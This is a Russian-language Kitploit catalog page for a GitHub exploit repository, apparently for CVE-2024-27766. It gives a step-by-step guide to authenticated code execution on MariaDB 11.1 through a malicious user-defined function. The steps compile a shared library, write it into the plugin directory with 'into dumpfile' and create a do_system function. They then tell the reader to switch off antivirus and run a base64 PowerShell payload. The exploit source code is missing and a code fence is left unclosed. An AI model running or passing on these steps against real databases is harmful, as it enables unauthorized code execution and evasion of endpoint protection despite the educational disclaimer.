Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Mysql_CVE-2024-27766 — Database authenticated code execution | Kitploit
Инструменты/GitHubGitHub/hissec/mysql_cve-2024-27766
Vulnerability AnalysisExploitationPenetration TestingLearning & EducationPayload DevelopmentDatabase Security
GitHubhissec/mysql_cve-2024-27766

Mysql_CVE-2024-27766

Database authenticated code execution

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Руководство по воспроизведению эксплойта (затронутая версия продукта MariaDB 11.1)

Это руководство содержит пошаговые инструкции по воспроизведению атаки с использованием пользовательской функции (UDF) на систему базы данных. Обратите внимание, что этот эксплойт может работать на некоторых системах, но может некорректно функционировать в 64-битных архитектурах или некоторых сборках.

Предупреждение: Данный материал предназначен только для образовательных целей. Несанкционированное использование этих методов является незаконным и неэтичным.

Шаги по воспроизведению атаки

1. Загрузка и подготовка кода UDF

Сначала создайте файл с именем exploit.c и добавьте следующий код:

root@kitploit:~

### 2. Компиляция кода UDF

Скомпилируйте код эксплойта с помощью компилятора `x86_64-w64-mingw32-gcc`:

```bash
x86_64-w64-mingw32-gcc -g -c exploit.c

3. Создание файла разделяемой библиотеки

Создайте файл разделяемой библиотеки (exploit.so) из скомпилированного объектного файла:

root@kitploit:~
x86_64-w64-mingw32-gcc -g -shared -Wl,-soname,exploit.so -o exploit.so exploit.o

4. Преобразование файла разделяемой библиотеки в шестнадцатеричный формат

Используйте xxd для преобразования файла .so в шестнадцатеричный формат:

root@kitploit:~
xxd -p exploit.so | tr -d '\n' > hex_value.txt

5. Загрузка шестнадцатеричного значения в базу данных

Скопируйте шестнадцатеричное значение из hex_value.txt и выполните следующую команду в вашей базе данных:

root@kitploit:~
DB> set @shell = 0x<hex_value>;

6. Определение каталога плагинов и развертывание эксплойта

Найдите каталог плагинов, выполнив:

root@kitploit:~
DB> select @@plugin_dir;

Затем создайте разделяемую библиотеку эксплойта в каталоге плагинов:

root@kitploit:~
DB> select binary @shell into dumpfile 'C:\\Program Files\\MariaDB 11.1\\lib\\plugin\\exploit.so';

Примечание: Откорректируйте путь в соответствии с конфигурацией вашей системы или конкретным каталогом плагинов.

7. Создание вредоносной функции

Создайте новую функцию в базе данных, используя эксплойт:

root@kitploit:~
DB> create function do_system returns integer soname 'exploit.so';

8. Выполнение эксплойта

Отключите любое антивирусное ПО или Защитник Windows, которые могут блокировать эксплойт. Затем выполните команду с помощью только что созданной функции:

root@kitploit:~
DB> select do_system('powershell base64 here');

Замените 'powershell base64 here' на base64-закодированную полезную нагрузку команды, которую вы хотите выполнить.


Отказ от ответственности: Данный документ предназначен только для образовательных целей и исследований в области безопасности. Неправильное использование этой информации может привести к уголовной ответственности и серьезным правовым последствиям. Всегда получайте разрешение от соответствующих органов перед тестированием любых уязвимостей в сети или системе.

Скачать инструмент